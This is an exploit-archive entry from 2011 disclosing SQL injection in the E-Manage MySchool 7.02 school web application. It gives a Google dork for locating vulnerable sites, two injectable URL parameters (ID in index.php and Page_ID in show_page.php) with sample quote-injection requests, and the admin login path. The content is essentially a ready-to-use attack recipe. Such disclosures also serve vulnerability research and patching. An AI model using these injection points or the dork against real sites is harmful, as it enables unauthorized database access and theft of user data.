E-Manage MySchool 7.02 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : E-Manage MySchool 7.02 SQL Injection Vulnerability
# Published : 2011-05-21
# Author :
# Previous Title : Easy Media Script SQL Injection Vulnerability
# Next Title : Clipbucket 2.4 RC2 645 SQL Injection Vulnerability

Exploit Title: SQL Injection MySchool Version 7.02
################################################## 
# Google Dork: "MySchool Version 7.02"
# Date: 05-21-2011
# Software Link: http://em.com.eg/
# Version: Version 7.02
# Author: az7rb
# Tested on : winxp sp3 Ar end bt5 
# Homepage : www.p0c.cc 
# Greetz : p0c Team & Dr.NaNo & All My Msn Messenger Friends
################################################## 
################################################## 
#################### wWw.p0c.cc #####################
################################################## 
# SQL :
# 
http://localhost/myschool/index.php?do=show_details&ID=[sql] 
# Example :
# 
http://localhost/myschool/index.php?do=show_details&ID=29' 
# SQL 2 :
#  
http://localhost/myschool/show_page.php?Page_ID=[sql] 
# Example :
#  
http://localhost/myschool/show_page.php?Page_ID=&table=users' 
# Link Control Panel :
http://localhost/myschool/login.php
##################################################